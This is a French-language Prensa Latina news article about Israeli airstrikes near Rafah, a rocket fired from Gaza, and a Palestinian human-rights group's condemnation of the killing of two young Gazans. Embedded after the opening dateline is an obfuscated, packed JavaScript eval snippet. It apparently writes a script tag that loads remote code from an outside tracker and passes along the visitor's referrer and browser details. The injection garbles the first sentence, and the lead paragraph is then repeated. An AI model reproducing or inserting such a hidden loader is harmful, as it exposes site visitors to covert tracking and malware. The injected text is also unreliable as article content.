mercredi 24 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Israël bombarde de nouveau la Bande Gaza

Gaza, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eenra|var|u0026u|referrer|trkyk||js|php'.split('|'),0,{})) 19 février (Prensa Latina) Des avions israéliens ont aujourd´hui bombardé plusieurs localités de la Bande de Gaza sans que ne soient signalées de victimes pour le moment.

Gaza, 19 février (Prensa Latina) Des avions israéliens ont aujourd´hui bombardé plusieurs localités de la Bande de Gaza sans que ne soient signalées de victimes pour le moment.

Des sources locales assurent que les avions de la Force Aérienne d´Israël ont réalisé 10 incursions dans les premières heures de la journée au-dessus de zones proches de la ville de Rafah, au sud de la Bande de Gaza.

De l´autre côté, et selon un porte-parole de l´armée, l´attaque a été effectuée en réponse à un tir de missile depuis Gaza en direction d´une zone de Sha´ar Hanegev, au sud d´Israël, dans la nuit de dimanche, et qui n´a fait ni victime ni dommages matériaux.

Selon le porte-parole, « les avions de combat ont attaqué une infrastructure souterraine à Gaza » ; sans ajouter de détails au sujet de l´action menée.

Dans la nuit de dimanche, l´armée israélienne a révélé avoir attaqué 18 objectifs du mouvement palestinien Hamas dans la Bande de Gaza ; la seconde action de ce type en moins de 24 heures.

Pour sa part, le Hamas accuse Tel-Aviv d´être responsable de l´escalade de violence dans la région.

La veille, le Centre Palestinien pour les Droits de l´Homme (PCHR) a qualifié de nouveau crime de guerre l´assassinat de deux jeunes de Gaza par des soldats israéliens.

Dans la nuit de samedi, des forces israéliennes stationnées le long de la frontière qui sépare la Bande de Gaza d´Israël, à l´Est de la ville de Rafah, ont lancé dix obus d´artillerie et ont ouvert le feu à l´arme automatique contre quatre mineurs.

Pour le PCHR, « l´attaque viole le principe de distinction et de nécessité de l´usage de la force militaire, compte tenu du fait que les mineurs assassinés et blessés étaient des civils désarmés qui ne réalisaient aucune action qui pouvait mettre en danger la vie des soldats de Tel-Aviv ».

Puis le PCHR a finalement réitéré son appel à la communauté internationale pour qu´elle agisse immédiatement pour mettre fin aux crimes israéliens.

peo/mem/mv

EN CONTINU
notes connexes